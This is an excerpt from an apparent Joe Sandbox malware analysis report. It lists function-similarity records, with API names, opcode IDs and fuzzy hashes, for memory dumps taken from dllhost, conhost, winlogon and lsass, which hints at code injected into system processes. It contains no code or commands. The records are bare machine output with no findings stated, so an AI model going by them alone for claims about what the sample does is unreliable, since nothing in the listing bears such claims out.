                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$Process$Free
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3168794593-0
                                                                                                                                                          • Opcode ID: ba5f53336e6612f67f84370bf05ece9e08de79f6dc7f5e86e37cd44739219e00
                                                                                                                                                          • Instruction ID: 5a1011d9486e765d7ba40cc25435cd7167fae03bd1d0927e1cf3db12c06e0eeb
                                                                                                                                                          • Opcode Fuzzy Hash: ba5f53336e6612f67f84370bf05ece9e08de79f6dc7f5e86e37cd44739219e00
                                                                                                                                                          • Instruction Fuzzy Hash: 2A0132B2610A808AE705EF67B80438977A0F78CFC0F4A4525FB5953B39CE38D091C744
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                          • String ID: ntdll.dll
                                                                                                                                                          • API String ID: 1646373207-2227199552
                                                                                                                                                          • Opcode ID: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
                                                                                                                                                          • Instruction ID: 17fa8e42c722db624f1936625922d1a8ab69534039b48c71a9bb0a293c881c2b
                                                                                                                                                          • Opcode Fuzzy Hash: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
                                                                                                                                                          • Instruction Fuzzy Hash: CAD0C9F8B1260182EF1AEB6778553E152515B6DBC9F4940209F0647772DE38C0E48318
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1617791916-0
                                                                                                                                                          • Opcode ID: c7a43bef6df9d8d05703a7189659e0aa7f0603dabacb6fa5d63025371af7a52a
                                                                                                                                                          • Instruction ID: 6e91e1ae57bb2f507bdd30ccb813d710b9eda330d3ff7d449275dd8231ce62c3
                                                                                                                                                          • Opcode Fuzzy Hash: c7a43bef6df9d8d05703a7189659e0aa7f0603dabacb6fa5d63025371af7a52a
                                                                                                                                                          • Instruction Fuzzy Hash: EBE032F1B41A0086E709DB63E80838936E1EB9CB85F898024AA0907371DF7D85D98B90
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1617791916-0
                                                                                                                                                          • Opcode ID: 63251503df5c7392b59882377b05ff3c407c5ffe99838fad78ad3d93c79eabbc
                                                                                                                                                          • Instruction ID: a4bc93d2c7b124559308cf7a4161fd93bc4ab92d57e3b019964b2e6119ad9c46
                                                                                                                                                          • Opcode Fuzzy Hash: 63251503df5c7392b59882377b05ff3c407c5ffe99838fad78ad3d93c79eabbc
                                                                                                                                                          • Instruction Fuzzy Hash: B7E0EDF1B5150086E709DB63E84439976A1FB9CB55F858024DA1907731DE3885D58654
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000063.00000003.2330966788.0000021C0EE50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021C0EE50000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_99_3_21c0ee50000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction ID: aaaacf6251090a20003498801bfc0ffb0978ec1ac70671345a9d0c8915545576
                                                                                                                                                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction Fuzzy Hash: 809104BBBA1258C7EB648F25D508BADB391F768BD4F7481249E690778CDA38DC12C710
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000063.00000003.2330966788.0000021C0EE50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021C0EE50000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_99_3_21c0ee50000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction ID: ca1fd64daf2b0a4948670de3ac739d6930f3f1d2858b4820c31bf69e15dfad30
                                                                                                                                                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction Fuzzy Hash: 7BD19FBB6A0748C6EB64DF65D4893DD37A0F7A9788F300215EEA957B56DB39C880C700
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000063.00000003.2330966788.0000021C0EE50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021C0EE50000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_99_3_21c0ee50000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 190073905-0
                                                                                                                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction ID: 820b840ec2cbb8ef516a0b9ee9dd7ae91cee478e0cfee25f32560845f3e2b747
                                                                                                                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction Fuzzy Hash: B581B1FA6F064DC6FB54AB65A8493D923D5ABBE780F344017AA78473D6DA38CC61C700
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000063.00000003.2330966788.0000021C0EE50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021C0EE50000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_99_3_21c0ee50000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction ID: d9f6d747a60dbc4def380006989433280ee9dac4b52c1cb6543afb093d050c4b
                                                                                                                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction Fuzzy Hash: 32516FBB1E4388CAEB748F1195483E877A0F3A9B94F344225DAB947B96CB39CC51C711
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000063.00000003.2330966788.0000021C0EE50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021C0EE50000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_99_3_21c0ee50000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                          • String ID: csm
                                                                                                                                                          • API String ID: 3242871069-1018135373
                                                                                                                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction ID: 76f2d898b7b1407b6ec90b707ae8de20e773f6ba73747879d65db63cbfd0fbb3
                                                                                                                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction Fuzzy Hash: 1751E17B3A1A48CAEB58CF15E448BAC3791F368B88F358531DA6A47788DB78CC41C704
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000063.00000003.2330966788.0000021C0EE50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021C0EE50000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_99_3_21c0ee50000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CallTranslator
                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                          • API String ID: 3163161869-2084237596
                                                                                                                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction ID: e354d079493dbccda08c9e50880f73bcba44bcad1dcb7cbebc356efe30ea12f0
                                                                                                                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction Fuzzy Hash: B1619FB7554BC8C2EB718F15E4443DAB7A0F7E9B88F244215EBA807B96DB78C590CB00
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000065.00000003.2213063210.000001FC60380000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_101_3_1fc60380000_winlogon.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Virtual$Protect$AllocLibraryLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3316853933-0
                                                                                                                                                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction ID: 8bce46fc543ae081488779d75da3210721d0bb905b841cdb0702c637384acb33
                                                                                                                                                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction Fuzzy Hash: CF917972B4525A87DB64DF25D6047BDB3A1F784FAAF4480309F4EA7788DA38D812D740
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000065.00000003.2213063210.000001FC60380000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_101_3_1fc60380000_winlogon.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
• Instruction ID: 9e6e4b0c9110d5ca3692e171d6a273fb2cef563f1550245383cc97ce84b37ef0
• Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
• Instruction Fuzzy Hash: DFD18E3264874A86EB609F65D5803FD37B0F7857A9F140176EE8DA7B96DB38C081D780
APIs

Memory Dump Source
• Source File: 00000065.00000003.2213063210.000001FC60380000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_101_3_1fc60380000_winlogon.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 190073905-0
• Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
• Instruction ID: 8a20bbfa8dfcfe1306035f685aed67c032877c29451ab59ba31faf1f9e5c9365
• Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
• Instruction Fuzzy Hash: 5881F53178C60F46F750AB6596413F962B2BBC67A2F4440B5A91DF7792EB38C841B7C0
APIs
Strings

Memory Dump Source
• Source File: 00000065.00000003.2213063210.000001FC60380000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_101_3_1fc60380000_winlogon.jbxd
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
• Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
• Instruction ID: ca8160818863da491ee67902fb181d338932bf5fe08705d1ce015dc7c9d5fa37
• Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
• Instruction Fuzzy Hash: E351C37218874A8AEB748F2196443A877B0F394BA6F184176DB4DE7BC1C738C451EB81
APIs
Strings

Memory Dump Source
• Source File: 00000065.00000003.2213063210.000001FC60380000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_101_3_1fc60380000_winlogon.jbxd
Similarity
• API ID: CurrentImageNonwritable__except_validate_context_record
• String ID: csm
• API String ID: 3242871069-1018135373
• Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
• Instruction ID: 0242fd2eae0423c7464daf3576405f8532a4946143b9cb06bba5e256cb04bc2d
• Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
• Instruction Fuzzy Hash: 3F510732359A0A8ADB54CF15E508BBD33B1F3C4BA9F154571DA5DA3788DBB8C841D780
APIs
Strings

Memory Dump Source
• Source File: 00000065.00000003.2213063210.000001FC60380000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_101_3_1fc60380000_winlogon.jbxd
Similarity
• API ID: CallTranslator
• String ID: MOC$RCC
• API String ID: 3163161869-2084237596
• Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
• Instruction ID: 02621d02fdd16b215d972bbfef03ced0caed4d5c80fd12044c9d96ea17b3d44b
• Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
• Instruction Fuzzy Hash: 8161B132508BC985E7318F25E5403EAB7B0F7C5BA9F084266EB9C67B95CB78D194CB40
APIs

Memory Dump Source
• Source File: 00000067.00000003.2274514017.00000161C7340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7340000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_103_3_161c7340000_lsass.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
• Instruction ID: 82878ac55d6fbc236b625adb97a6ecb7da2b80f5ecaa9a4faf307d6ec6648637
• Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
• Instruction Fuzzy Hash: 0C91697AB4115097DB68DF25D800BBDBBA1FB54B98F4C9524DE4A2B7C8DA3AD812C700
APIs
Strings

Memory Dump Source
• Source File: 00000067.00000003.2274514017.00000161C7340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7340000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_103_3_161c7340000_lsass.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
• Instruction ID: 9740bafd52b75fa44ca08665e99cbf6f70754816e2eb9dfb493b29da71e8f607
• Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
• Instruction Fuzzy Hash: BCD1B07B640780AAEB68DF65D8803FD3FA4F745788F182115EE8957B9ADBB6C480C704
APIs

Memory Dump Source
• Source File: 00000067.00000003.2274514017.00000161C7340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7340000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_103_3_161c7340000_lsass.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 190073905-0
• Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
• Instruction ID: 8715275c4f18c938976bb002d9272c2bd181a0d1b0ba54d8d67724864115c336
• Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
• Instruction Fuzzy Hash: 1181E17868124176FB9CEB769C493FD2BA1AB86780F0C7015AE0847796DAFBC845CF40
APIs
Strings

Memory Dump Source
• Source File: 00000067.00000003.2274514017.00000161C7340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7340000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_103_3_161c7340000_lsass.jbxd
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
• Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
• Instruction ID: 23d2a2badbf84a5d161b87e38df25d7b3e44fab3e80074d5616eff65742b1415
• Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
• Instruction Fuzzy Hash: 5251923A184280AAEB78CF2199483BC7FE0F354B95F1C6115DA9957BD5CBBAC450C706
APIs
Strings

Memory Dump Source
• Source File: 00000067.00000003.2274514017.00000161C7340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7340000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_103_3_161c7340000_lsass.jbxd
Similarity
• API ID: CurrentImageNonwritable__except_validate_context_record
• String ID: csm
• API String ID: 3242871069-1018135373
• Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
• Instruction ID: e4173f24aca5bffb710f7f7a66e82975f39ad3c21218f42f8ea84a18b8822ccd
• Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
• Instruction Fuzzy Hash: B451D43A351A04AAEB5CCF16E844BFC3BA1F744B98F199525DE5A47788DBBAC841C700
APIs
Strings

Memory Dump Source
• Source File: 00000067.00000003.2274514017.00000161C7340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7340000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_103_3_161c7340000_lsass.jbxd
Similarity
• API ID: CallTranslator
• String ID: MOC$RCC
• API String ID: 3163161869-2084237596
• Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
• Instruction ID: fcf457bf67f50a1e8609c86a2075d4e929f9389816d008143e9caf8f17e6cf69
• Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
• Instruction Fuzzy Hash: 63617B36508BC495EB75DB15E8407EEBFA0F785B98F086215EB9807B99CBB9C190CB04